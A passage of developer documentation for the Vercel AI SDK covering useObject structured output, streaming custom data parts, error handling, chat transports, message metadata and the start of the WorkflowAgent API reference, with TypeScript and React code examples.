      `Generate 3 notifications for a messages app in this context:` + context,
  });

  return result.toTextStreamResponse();
}

Enum Output Mode

Example: Text Classification

This example shows how to build a simple text classifier that categorizes statements as true or false.

Client

When using useObject with enum output mode, your schema must be an object with enum as the key:

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';
import { z } from 'zod';

export default function ClassifyPage() {
  const { object, submit, isLoading } = useObject({
    api: '/api/classify',
    schema: z.object({ enum: z.enum(['true', 'false']) }),
  });

  return (
    <>
      <button onClick={() => submit('The earth is flat')} disabled={isLoading}>
        Classify statement
      </button>

      {object && <div>Classification: {object.enum}</div>}
    </>
  );
}

Server

On the server, use streamText with Output.choice() to stream the classification result:

import { streamText, Output } from 'ai';
__PROVIDER_IMPORT__;

export async function POST(req: Request) {
  const context = await req.json();

  const result = streamText({
    model: __MODEL__,
    output: Output.choice({ options: ['true', 'false'] }),
    prompt: `Classify this statement as true or false: ${context}`,
  });

  return result.toTextStreamResponse();
}

Customized UI

useObject also provides ways to show loading and error states:

Loading State

The isLoading state returned by the useObject hook can be used for several purposes:

To show a loading spinner while the object is generated.
To disable the submit button.

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';

export default function Page() {
  const { isLoading, object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      {isLoading && <Spinner />}

      <button
        onClick={() => submit('Messages during finals week.')}
        disabled={isLoading}
      >
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Stop Handler

The stop function can be used to stop the object generation process. This can be useful if the user wants to cancel the request or if the server is taking too long to respond.

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';

export default function Page() {
  const { isLoading, stop, object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      {isLoading && (
        <button type="button" onClick={() => stop()}>
          Stop
        </button>
      )}

      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Error State

Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, or to disable the submit button:

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';

export default function Page() {
  const { error, object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
  });

  return (
    <>
      {error && <div>An error occurred.</div>}

      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </>
  );
}

Event Callbacks

useObject provides optional event callbacks that you can use to handle life-cycle events.

onFinish: Called when the object generation is completed.
onError: Called when an error occurs during the fetch request.

These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.

'use client';

import { experimental_useObject as useObject } from '@ai-sdk/react';
import { notificationSchema } from './api/notifications/schema';

export default function Page() {
  const { object, submit } = useObject({
    api: '/api/notifications',
    schema: notificationSchema,
    onFinish({ object, error }) {
      // typed object, undefined if schema validation fails:
      console.log('Object generation completed:', object);

      // error, undefined if schema validation succeeds:
      console.log('Schema validation error:', error);
    },
    onError(error) {
      // error during fetch request:
      console.error('An error occurred:', error);
    },
  });

  return (
    <div>
      <button onClick={() => submit('Messages during finals week.')}>
        Generate notifications
      </button>

      {object?.notifications?.map((notification, index) => (
        <div key={index}>
          <p>{notification?.name}</p>
          <p>{notification?.message}</p>
        </div>
      ))}
    </div>
  );
}

Configure Request Options

You can configure the API endpoint, optional headers and credentials using the api, headers and credentials settings.

const { submit, object } = useObject({
  api: '/api/use-object',
  headers: {
    'X-Custom-Header': 'CustomValue',
  },
  credentials: 'include',
  schema: yourSchema,
});

title: Streaming Custom Data description: Learn how to stream custom data from the server to the client.

Streaming Custom Data

The AI SDK provides several helpers that allows you to stream additional data to the client and attach it to the UIMessage parts array:

createUIMessageStream: creates a data stream
createUIMessageStreamResponse: creates a response object that streams data
pipeUIMessageStreamToResponse: pipes a data stream to a server response object

The data is streamed as part of the response stream using Server-Sent Events.

Setting Up Type-Safe Data Streaming

First, define your custom message type with data part schemas for type safety:

import { UIMessage } from 'ai';

// Define your custom message type with data part schemas
export type MyUIMessage = UIMessage<
  never, // metadata type
  {
    weather: {
      city: string;
      weather?: string;
      status: 'loading' | 'success';
    };
    notification: {
      message: string;
      level: 'info' | 'warning' | 'error';
    };
  } // data parts type
>;

Streaming Data from the Server

In your server-side route handler, you can create a UIMessageStream and then pass it to createUIMessageStreamResponse:

import { openai } from '@ai-sdk/openai';
import {
  createUIMessageStream,
  createUIMessageStreamResponse,
  streamText,
  convertToModelMessages,
} from 'ai';
__PROVIDER_IMPORT__;
import type { MyUIMessage } from '@/ai/types';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const stream = createUIMessageStream<MyUIMessage>({
    execute: ({ writer }) => {
      // 1. Send initial status (transient - won't be added to message history)
      writer.write({
        type: 'data-notification',
        data: { message: 'Processing your request...', level: 'info' },
        transient: true, // This part won't be added to message history
      });

      // 2. Send sources (useful for RAG use cases)
      writer.write({
        type: 'source',
        value: {
          type: 'source',
          sourceType: 'url',
          id: 'source-1',
          url: 'https://weather.com',
          title: 'Weather Data Source',
        },
      });

      // 3. Send data parts with loading state
      writer.write({
        type: 'data-weather',
        id: 'weather-1',
        data: { city: 'San Francisco', status: 'loading' },
      });

      const result = streamText({
        model: __MODEL__,
        messages: await convertToModelMessages(messages),
        onFinish() {
          // 4. Update the same data part (reconciliation)
          writer.write({
            type: 'data-weather',
            id: 'weather-1', // Same ID = update existing part
            data: {
              city: 'San Francisco',
              weather: 'sunny',
              status: 'success',
            },
          });

          // 5. Send completion notification (transient)
          writer.write({
            type: 'data-notification',
            data: { message: 'Request completed', level: 'info' },
            transient: true, // Won't be added to message history
          });
        },
      });

      writer.merge(result.toUIMessageStream());
    },
  });

  return createUIMessageStreamResponse({ stream });
}

Types of Streamable Data

Data Parts (Persistent)

Regular data parts are added to the message history and appear in message.parts:

writer.write({
  type: 'data-weather',
  id: 'weather-1', // Optional: enables reconciliation
  data: { city: 'San Francisco', status: 'loading' },
});

Sources

Sources are useful for RAG implementations where you want to show which documents or URLs were referenced:

writer.write({
  type: 'source',
  value: {
    type: 'source',
    sourceType: 'url',
    id: 'source-1',
    url: 'https://example.com',
    title: 'Example Source',
  },
});

Transient Data Parts (Ephemeral)

Transient parts are sent to the client but not added to the message history. They are only accessible via the onData useChat handler:

// server
writer.write({
  type: 'data-notification',
  data: { message: 'Processing...', level: 'info' },
  transient: true, // Won't be added to message history
});

// client
const [notification, setNotification] = useState();

const { messages } = useChat({
  onData: ({ data, type }) => {
    if (type === 'data-notification') {
      setNotification({ message: data.message, level: data.level });
    }
  },
});

Data Part Reconciliation

When you write to a data part with the same ID, the client automatically reconciles and updates that part. This enables powerful dynamic experiences like:

Collaborative artifacts - Update code, documents, or designs in real-time
Progressive data loading - Show loading states that transform into final results
Live status updates - Update progress bars, counters, or status indicators
Interactive components - Build UI elements that evolve based on user interaction

The reconciliation happens automatically - simply use the same id when writing to the stream.

Processing Data on the Client

Using the onData Callback

The onData callback is essential for handling streaming data, especially transient parts:

import { useChat } from '@ai-sdk/react';
import type { MyUIMessage } from '@/ai/types';

const { messages } = useChat<MyUIMessage>({
  api: '/api/chat',
  onData: dataPart => {
    // Handle all data parts as they arrive (including transient parts)
    console.log('Received data part:', dataPart);

    // Handle different data part types
    if (dataPart.type === 'data-weather') {
      console.log('Weather update:', dataPart.data);
    }

    // Handle transient notifications (ONLY available here, not in message.parts)
    if (dataPart.type === 'data-notification') {
      showToast(dataPart.data.message, dataPart.data.level);
    }
  },
});

Important: Transient data parts are only available through the onData callback. They will not appear in the message.parts array since they're not added to message history.

Rendering Persistent Data Parts

You can filter and render data parts from the message parts array:

const result = (
  <>
    {messages?.map(message => (
      <div key={message.id}>
        {/* Render weather data parts */}
        {message.parts
          .filter(part => part.type === 'data-weather')
          .map((part, index) => (
            <div key={index} className="weather-widget">
              {part.data.status === 'loading' ? (
                <>Getting weather for {part.data.city}...</>
              ) : (
                <>
                  Weather in {part.data.city}: {part.data.weather}
                </>
              )}
            </div>
          ))}

        {/* Render text content */}
        {message.parts
          .filter(part => part.type === 'text')
          .map((part, index) => (
            <div key={index}>{part.text}</div>
          ))}

        {/* Render sources */}
        {message.parts
          .filter(part => part.type === 'source')
          .map((part, index) => (
            <div key={index} className="source">
              Source: <a href={part.url}>{part.title}</a>
            </div>
          ))}
      </div>
    ))}
  </>
);

Complete Example

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
import type { MyUIMessage } from '@/ai/types';

export default function Chat() {
  const [input, setInput] = useState('');

  const { messages, sendMessage } = useChat<MyUIMessage>({
    api: '/api/chat',
    onData: dataPart => {
      // Handle transient notifications
      if (dataPart.type === 'data-notification') {
        console.log('Notification:', dataPart.data.message);
      }
    },
  });

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <>
      {messages?.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}

          {/* Render weather data */}
          {message.parts
            .filter(part => part.type === 'data-weather')
            .map((part, index) => (
              <span key={index} className="weather-update">
                {part.data.status === 'loading' ? (
                  <>Getting weather for {part.data.city}...</>
                ) : (
                  <>
                    Weather in {part.data.city}: {part.data.weather}
                  </>
                )}
              </span>
            ))}

          {/* Render text content */}
          {message.parts
            .filter(part => part.type === 'text')
            .map((part, index) => (
              <div key={index}>{part.text}</div>
            ))}
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          placeholder="Ask about the weather..."
        />
        <button type="submit">Send</button>
      </form>
    </>
  );
}

Use Cases

RAG Applications - Stream sources and retrieved documents
Real-time Status - Show loading states and progress updates
Collaborative Tools - Stream live updates to shared artifacts
Analytics - Send usage data without cluttering message history
Notifications - Display temporary alerts and status messages

Message Metadata vs Data Parts

Both message metadata and data parts allow you to send additional information alongside messages, but they serve different purposes:

Message Metadata

Message metadata is best for message-level information that describes the message as a whole:

Attached at the message level via message.metadata
Sent using the messageMetadata callback in toUIMessageStreamResponse
Ideal for: timestamps, model info, token usage, user context
Type-safe with custom metadata types

// Server: Send metadata about the message
return result.toUIMessageStreamResponse({
  messageMetadata: ({ part }) => {
    if (part.type === 'finish') {
      return {
        model: part.response.modelId,
        totalTokens: part.totalUsage.totalTokens,
        createdAt: Date.now(),
      };
    }
  },
});

Data Parts

Data parts are best for streaming dynamic arbitrary data:

Added to the message parts array via message.parts
Streamed using createUIMessageStream and writer.write()
Can be reconciled/updated using the same ID
Support transient parts that don't persist
Ideal for: dynamic content, loading states, interactive components

// Server: Stream data as part of message content
writer.write({
  type: 'data-weather',
  id: 'weather-1',
  data: { city: 'San Francisco', status: 'loading' },
});

For more details on message metadata, see the Message Metadata documentation.

title: Error Handling description: Learn how to handle errors in the AI SDK UI

Error Handling and warnings

Warnings

The AI SDK shows warnings when something might not work as expected. These warnings help you fix problems before they cause errors.

When Warnings Appear

Warnings are shown in the browser console when:

Unsupported features: You use a feature or setting that is not supported by the AI model (e.g., certain options or parameters).
Compatibility warnings: A feature is used in a compatibility mode, which might work differently or less optimally than intended.
Other warnings: The AI model reports another type of issue, such as general problems or advisory messages.

Warning Messages

All warnings start with "AI SDK Warning:" so you can easily find them. For example:

AI SDK Warning: The feature "temperature" is not supported by this model

Turning Off Warnings

By default, warnings are shown in the console. You can control this behavior:

Turn Off All Warnings

Set a global variable to turn off warnings completely:

globalThis.AI_SDK_LOG_WARNINGS = false;

Custom Warning Handler

You can also provide your own function to handle warnings. It receives provider id, model id, and a list of warnings.

globalThis.AI_SDK_LOG_WARNINGS = ({ warnings, provider, model }) => {
  // Handle warnings your own way
};

Error Handling

Error Helper Object

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { messages, sendMessage, error, regenerate } = useChat();

  const handleSubmit = (e: React.FormEvent) => {
    e.preventDefault();
    sendMessage({ text: input });
    setInput('');
  };

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}:{' '}
          {m.parts
            .filter(part => part.type === 'text')
            .map(part => part.text)
            .join('')}
        </div>
      ))}

      {error && (
        <>
          <div>An error occurred.</div>
          <button type="button" onClick={() => regenerate()}>
            Retry
          </button>
        </>
      )}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          disabled={error != null}
        />
      </form>
    </div>
  );
}

Alternative: replace last message

Alternatively you can write a custom submit handler that replaces the last message when an error is present.

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { sendMessage, error, messages, setMessages } = useChat();

  function customSubmit(event: React.FormEvent<HTMLFormElement>) {
    event.preventDefault();

    if (error != null) {
      setMessages(messages.slice(0, -1)); // remove last message
    }

    sendMessage({ text: input });
    setInput('');
  }

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}:{' '}
          {m.parts
            .filter(part => part.type === 'text')
            .map(part => part.text)
            .join('')}
        </div>
      ))}

      {error && <div>An error occurred.</div>}

      <form onSubmit={customSubmit}>
        <input value={input} onChange={e => setInput(e.target.value)} />
      </form>
    </div>
  );
}

Error Handling Callback

Errors can be processed by passing an onError callback function as an option to the useChat or useCompletion hooks. The callback function receives an error object as an argument.

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const {
    /* ... */
  } = useChat({
    // handle error:
    onError: error => {
      console.error(error);
    },
  });
}

Injecting Errors for Testing

You might want to create errors for testing. You can easily do so by throwing an error in your route handler:

export async function POST(req: Request) {
  throw new Error('This is a test error');
}

title: Transport description: Learn how to use custom transports with useChat.

Transport

Default Transport

By default, useChat uses HTTP POST requests to send messages to /api/chat:

import { useChat } from '@ai-sdk/react';

// Uses default HTTP transport
const { messages, sendMessage } = useChat();

This is equivalent to:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/chat',
  }),
});

Custom Transport Configuration

Configure the default transport with custom options:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/custom-chat',
    headers: {
      Authorization: 'Bearer your-token',
      'X-API-Version': '2024-01',
    },
    credentials: 'include',
  }),
});

Dynamic Configuration

You can also provide functions that return configuration values. This is useful for authentication tokens that need to be refreshed, or for configuration that depends on runtime conditions:

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/chat',
    headers: () => ({
      Authorization: `Bearer ${getAuthToken()}`,
      'X-User-ID': getCurrentUserId(),
    }),
    body: () => ({
      sessionId: getCurrentSessionId(),
      preferences: getUserPreferences(),
    }),
    credentials: () => 'include',
  }),
});

Request Transformation

Transform requests before sending to your API:

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/chat',
    prepareSendMessagesRequest: ({ id, messages, trigger, messageId }) => {
      return {
        headers: {
          'X-Session-ID': id,
        },
        body: {
          messages: messages.slice(-10), // Only send last 10 messages
          trigger,
          messageId,
        },
      };
    },
  }),
});

Direct Agent Transport

This is useful for:

Server-side rendering: Run the agent on the server without an API endpoint
Testing: Test chat functionality without network requests
Single-process applications: Desktop or CLI apps where client and agent run together

import { useChat } from '@ai-sdk/react';
import { DirectChatTransport, ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;

const agent = new ToolLoopAgent({
  model: __MODEL__,
  instructions: 'You are a helpful assistant.',
  tools: {
    weather: weatherTool,
  },
});

const { messages, sendMessage } = useChat({
  transport: new DirectChatTransport({ agent }),
});

How It Works

Unlike DefaultChatTransport which sends HTTP requests:

DirectChatTransport validates incoming UI messages
Converts them to model messages using convertToModelMessages
Calls the agent's stream() method directly
Returns the result as a UI message stream via toUIMessageStream()

Configuration Options

You can pass additional options to customize the stream output:

const transport = new DirectChatTransport({
  agent,
  // Pass options to the agent
  options: { customOption: 'value' },
  // Configure what's sent to the client
  sendReasoning: true,
  sendSources: true,
});

For complete API details, see the DirectChatTransport reference.

Workflow Transport

For chat apps built on Vercel Workflows, WorkflowChatTransport from @ai-sdk/workflow provides automatic stream reconnection. It handles the common scenario where a workflow function times out mid-stream — the transport detects the missing finish event and reconnects to resume from where it left off.

import { useChat } from '@ai-sdk/react';
import { WorkflowChatTransport } from '@ai-sdk/workflow';
import { useMemo } from 'react';

export default function Chat() {
  const transport = useMemo(
    () =>
      new WorkflowChatTransport({
        api: '/api/chat',
        maxConsecutiveErrors: 5,
        initialStartIndex: -50, // On page refresh, fetch last 50 chunks
        onChatEnd: ({ chatId, chunkIndex }) => {
          console.log(`Chat complete: ${chunkIndex} chunks`);
        },
      }),
    [],
  );

  const { messages, sendMessage } = useChat({ transport });

  // ... render chat UI
}

Key features:

Automatic reconnection: Detects interrupted streams (no finish event) and reconnects via GET to {api}/{runId}/stream
Page refresh recovery: initialStartIndex with negative values (e.g., -50) fetches only the tail of the stream instead of replaying everything
Configurable retries: maxConsecutiveErrors controls how many consecutive reconnection failures to tolerate
Lifecycle callbacks: onChatSendMessage and onChatEnd for tracking chat state

For the full API reference, see WorkflowChatTransport. For server-side endpoint setup, see the WorkflowAgent guide.

Building Custom Transports

To understand how to build your own transport, refer to the source code of the default implementation:

DefaultChatTransport - The complete default HTTP transport implementation
HttpChatTransport - Base HTTP transport with request handling
ChatTransport Interface - The transport interface you need to implement

These implementations show you exactly how to:

Handle the sendMessages method
Process UI message streams
Transform requests and responses
Handle errors and connection management

The transport system gives you complete control over how your chat application communicates, enabling integration with any backend protocol or service.

title: Reading UIMessage Streams description: Learn how to read UIMessage streams.

Reading UI Message Streams

UIMessage streams are useful outside of traditional chat use cases. You can consume them for terminal UIs, custom stream processing on the client, or React Server Components (RSC).

The readUIMessageStream helper transforms a stream of UIMessageChunk objects into an AsyncIterableStream of UIMessage objects, allowing you to process messages as they're being constructed.

Basic Usage

import { readUIMessageStream, streamText } from 'ai';
__PROVIDER_IMPORT__;

async function main() {
  const result = streamText({
    model: __MODEL__,
    prompt: 'Write a short story about a robot.',
  });

  for await (const uiMessage of readUIMessageStream({
    stream: result.toUIMessageStream(),
  })) {
    console.log('Current message state:', uiMessage);
  }
}

Tool Calls Integration

Handle streaming responses that include tool calls:

import { readUIMessageStream, streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';

async function handleToolCalls() {
  const result = streamText({
    model: __MODEL__,
    tools: {
      weather: tool({
        description: 'Get the weather in a location',
        inputSchema: z.object({
          location: z.string().describe('The location to get the weather for'),
        }),
        execute: ({ location }) => ({
          location,
          temperature: 72 + Math.floor(Math.random() * 21) - 10,
        }),
      }),
    },
    prompt: 'What is the weather in Tokyo?',
  });

  for await (const uiMessage of readUIMessageStream({
    stream: result.toUIMessageStream(),
  })) {
    // Handle different part types
    uiMessage.parts.forEach(part => {
      switch (part.type) {
        case 'text':
          console.log('Text:', part.text);
          break;
        case 'tool-call':
          console.log('Tool called:', part.toolName, 'with args:', part.args);
          break;
        case 'tool-result':
          console.log('Tool result:', part.result);
          break;
      }
    });
  }
}

Resuming Conversations

Resume streaming from a previous message state:

import { readUIMessageStream, streamText } from 'ai';
__PROVIDER_IMPORT__;

async function resumeConversation(lastMessage: UIMessage) {
  const result = streamText({
    model: __MODEL__,
    messages: [
      { role: 'user', content: 'Continue our previous conversation.' },
    ],
  });

  // Resume from the last message
  for await (const uiMessage of readUIMessageStream({
    stream: result.toUIMessageStream(),
    message: lastMessage, // Resume from this message
  })) {
    console.log('Resumed message:', uiMessage);
  }
}

title: Message Metadata description: Learn how to attach and use metadata with messages in AI SDK UI

Message Metadata

Overview

Getting Started

Here's a simple example of using message metadata to track timestamps and model information:

Defining Metadata Types

First, define your metadata type for type safety:

import { UIMessage } from 'ai';
import { z } from 'zod';

// Define your metadata schema
export const messageMetadataSchema = z.object({
  createdAt: z.number().optional(),
  model: z.string().optional(),
  totalTokens: z.number().optional(),
});

export type MessageMetadata = z.infer<typeof messageMetadataSchema>;

// Create a typed UIMessage
export type MyUIMessage = UIMessage<MessageMetadata>;

Sending Metadata from the Server

Use the messageMetadata callback in toUIMessageStreamResponse to send metadata at different streaming stages:

import { convertToModelMessages, streamText } from 'ai';
__PROVIDER_IMPORT__;
import type { MyUIMessage } from '@/types';

export async function POST(req: Request) {
  const { messages }: { messages: MyUIMessage[] } = await req.json();

  const result = streamText({
    model: __MODEL__,
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    originalMessages: messages, // pass this in for type-safe return objects
    messageMetadata: ({ part }) => {
      // Send metadata when streaming starts
      if (part.type === 'start') {
        return {
          createdAt: Date.now(),
          model: 'your-model-id',
        };
      }

      // Send additional metadata when streaming completes
      if (part.type === 'finish') {
        return {
          totalTokens: part.totalUsage.totalTokens,
        };
      }
    },
  });
}

Accessing Metadata on the Client

Access metadata through the message.metadata property:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import type { MyUIMessage } from '@/types';

export default function Chat() {
  const { messages } = useChat<MyUIMessage>({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  return (
    <div>
      {messages.map(message => (
        <div key={message.id}>
          <div>
            {message.role === 'user' ? 'User: ' : 'AI: '}
            {message.metadata?.createdAt && (
              <span className="text-sm text-gray-500">
                {new Date(message.metadata.createdAt).toLocaleTimeString()}
              </span>
            )}
          </div>

          {/* Render message content */}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <div key={index}>{part.text}</div> : null,
          )}

          {/* Display additional metadata */}
          {message.metadata?.totalTokens && (
            <div className="text-xs text-gray-400">
              {message.metadata.totalTokens} tokens
            </div>
          )}
        </div>
      ))}
    </div>
  );
}

Common Use Cases

Message metadata is ideal for:

Timestamps: When messages were created or completed
Model Information: Which AI model was used
Token Usage: Track costs and usage limits
User Context: User IDs, session information
Performance Metrics: Generation time, time to first token
Quality Indicators: Finish reason, confidence scores

title: WorkflowAgent description: API Reference for the WorkflowAgent class.

`WorkflowAgent`

Creates a durable, resumable AI agent for use inside Vercel Workflows. WorkflowAgent handles the agent loop, tool schema serialization across workflow step boundaries, and built-in tool approval flows.

Unlike ToolLoopAgent from the ai package, WorkflowAgent is designed to survive process restarts, pause for human approval, and integrate with the Workflow DevKit's step mechanism.

import { WorkflowAgent } from '@ai-sdk/workflow';
import { tool } from 'ai';
import { z } from 'zod';

const agent = new WorkflowAgent({
  model: 'anthropic/claude-sonnet-4-6',
  instructions: 'You are a helpful assistant.',
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string(),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72,
      }),
    }),
  },
});

const result = await agent.stream({
  messages: [{ role: 'user', content: [{ type: 'text', text: 'What is the weather in NYC?' }] }],
});

console.log(result.messages);

To see WorkflowAgent in action, check out these examples.

Import

Constructor

Parameters

<PropertiesTable content={[ { name: 'id', type: 'string', isOptional: true, description: 'The id of the agent.', }, { name: 'model', type: 'LanguageModel', isRequired: true, description: 'The language model to use. A string compatible with the Vercel AI Gateway (e.g., 'anthropic/claude-sonnet-4-6') or a provider instance (e.g., openai(\'gpt-4o\')).', }, { name: 'instructions', type: 'string | SystemModelMessage | SystemModelMessage[]', isOptional: true, description: 'Instructions for the agent, used as the system prompt. Supports provider-specific options (e.g., caching) when using the SystemModelMessage form.', }, { name: 'tools', type: 'Record<string, Tool>', isOptional: true, description: 'A set of tools the agent can call. Keys are tool names. Tools are serialized to JSON Schema across workflow step boundaries and validated with Ajv at runtime.', }, { name: 'toolChoice', type: 'ToolChoice', isOptional: true, description: "Tool call selection strategy. Options: 'auto' | 'none' | 'required' | { type: 'tool', toolName: string }. Default: 'auto'.", }, { name: 'stopWhen', type: 'StopCondition | StopCondition[]', isOptional: true, description: 'Default stop condition for the agent loop. Per-stream values override this default. Use isLoopFinished() to let the agent run until all tool calls have completed, but beware of potential runaway loops. See https://ai-sdk.dev/v7/docs/reference/ai-sdk-core/loop-finished#isloopfinished.', }, { name: 'activeTools', type: 'Array', isOptional: true, description: 'Default set of active tools. Limits which tools the model can call. Per-stream values override this default.', }, { name: 'output', type: 'OutputSpecification', isOptional: true, description: 'Default structured output specification. Per-stream values override this default.', }, { name: 'experimental_repairToolCall', type: 'ToolCallRepairFunction', isOptional: true, description: 'Default function to repair tool calls that fail to parse. Per-stream values override this default.', }, { name: 'experimental_download', type: 'DownloadFunction', isOptional: true, description: 'Default custom download function for URLs. Per-stream values override this default.', }, { name: 'prepareStep', type: 'PrepareStepCallback', isOptional: true, description: 'Callback called before each step in the agent loop. Use it to modify settings, manage context, or inject messages dynamically. Receives step number, previous steps, messages, and context.', }, { name: 'prepareCall', type: 'PrepareCallCallback', isOptional: true, description: 'Callback called once before the agent loop starts. Use it to transform model, instructions, tools configuration, or other settings based on runtime context. Cannot override tools (bound at construction for type safety).', }, { name: 'experimental_context', type: 'unknown', isOptional: true, description: 'Default context passed into tool execution and lifecycle callbacks for every stream call. Per-call values override this default. Experimental (can break in patch releases).', }, { name: 'telemetry', type: 'TelemetryOptions', isOptional: true, description: 'Telemetry configuration with options for enabling/disabling telemetry, setting a function ID, and recording inputs/outputs.', }, { name: 'experimental_onStart', type: 'WorkflowAgentOnStartCallback', isOptional: true, description: 'Callback called when the agent starts streaming, before any LLM calls. Receives the model and messages. If also specified in stream(), both callbacks fire (constructor first). Experimental (can break in patch releases).', properties: [ { type: 'OnStartEvent', parameters: [ { name: 'model', type: 'LanguageModel', description: 'The model being used for the generation.', }, { name: 'messages', type: 'Array', description: 'The messages being sent to the model.', }, ], }, ], }, { name: 'experimental_onStepStart', type: 'WorkflowAgentOnStepStartCallback', isOptional: true, description: 'Callback called before each step (LLM call) begins. Receives step number, model, and messages. If also specified in stream(), both callbacks fire (constructor first). Experimental (can break in patch releases).', properties: [ { type: 'OnStepStartEvent', parameters: [ { name: 'stepNumber', type: 'number', description: 'Zero-based index of the current step.', }, { name: 'model', type: 'LanguageModel', description: 'The model being used for this step.', }, { name: 'messages', type: 'Array', description: 'The messages that will be sent to the model for this step.', }, { name: 'steps', type: 'ReadonlyArray', description: 'Results from all previously finished steps.', }, ], }, ], }, { name: 'experimental_onToolExecutionStart', type: 'WorkflowAgentonToolExecutionStartCallback', isOptional: true, description: "Callback called right before a tool's execute function runs. If also specified in stream(), both callbacks fire (constructor first). Experimental (can break in patch releases).", properties: [ { type: 'ToolExecutionStartEvent', parameters: [ { name: 'toolCall', type: '{ type: "tool-call"; toolCallId: string; toolName: string; input: unknown }', description: 'The tool call being executed.', }, { name: 'stepNumber', type: 'number', description: 'Zero-based index of the current step.', }, ], }, ], }, { name: 'experimental_onToolExecutionEnd', type: 'WorkflowAgentonToolExecutionEndCallback', isOptional: true, description: "Callback called right after a tool's execute function completes or errors. Uses a discriminated union: check success to determine whether output or error is available. If also specified in stream(), both callbacks fire (constructor first). Experimental (can break in patch releases).", properties: [ { type: 'ToolExecutionEndEvent', parameters: [ { name: 'toolCall', type: '{ type: "tool-call"; toolCallId: string; toolName: string; input: unknown }', description: 'The tool call that was executed.', }, { name: 'stepNumber', type: 'number', description: 'Zero-based index of the current step.', }, { name: 'durationMs', type: 'number', description: 'Tool execution time in milliseconds.', }, { name: 'success', type: 'boolean', description: 'Whether the tool call succeeded. When true, output is available. When false, error is available.', }, { name: 'output', type: 'unknown', description: 'The tool result (only when success is true).', }, { name: 'error', type: 'unknown', description: 'The error that occurred (only when success is false).', }, ], }, ], }, { name: 'onStepFinish', type: 'WorkflowAgentOnStepFinishCallback', isOptional: true, description: 'Callback invoked after each agent step completes. If also specified in stream(), both callbacks fire (constructor first).', }, { name: 'onFinish', type: 'WorkflowAgentOnFinishCallback', isOptional: true, description: 'Callback called when all agent steps are finished and the response is complete. Receives steps, messages, text, finish reason, total usage, and context. If also specified in stream(), both callbacks fire (constructor first).', }, { name: 'maxOutputTokens', type: 'number', isOptional: true, description: 'Maximum number of tokens the model is allowed to generate.', }, { name: 'temperature', type: 'number', isOptional: true, description: 'Sampling temperature, controls randomness.', }, { name: 'topP', type: 'number', isOptional: true, description: 'Top-p (nucleus) sampling parameter.', }, { name: 'topK', type: 'number', isOptional: true, description: 'Top-k sampling parameter.', }, { name: 'presencePenalty', type: 'number', isOptional: true, description: 'Presence penalty parameter.', }, { name: 'frequencyPenalty', type: 'number', isOptional: true, description: 'Frequency penalty parameter.', }, { name: 'stopSequences', type: 'string[]', isOptional: true, description: 'Custom token sequences which stop the model output.', }, { name: 'seed', type: 'number', isOptional: true, description: 'Seed for deterministic generation (if supported).', }, { name: 'maxRetries', type: 'number', isOptional: true, description: 'How many times to retry on failure. Default: 2.', }, { name: 'headers', type: 'Record<string, string | undefined>', isOptional: true, description: 'Additional HTTP headers to be sent with the request. Only applicable for HTTP-based providers.', }, { name: 'providerOptions', type: 'ProviderOptions', isOptional: true, description: 'Additional provider-specific configuration.', }, ]} />

Properties

<PropertiesTable content={[ { name: 'id', type: 'string | undefined', description: 'The id of the agent. Used for telemetry identification. Read-only.', }, { name: 'tools', type: 'Record<string, Tool>', description: 'The tool set configured for this agent. Read-only.', }, ]} />

Methods

`stream()`

Runs the agent loop, streaming responses and executing tool calls as needed. Returns a promise resolving to a WorkflowAgentStreamResult.

const result = await agent.stream({
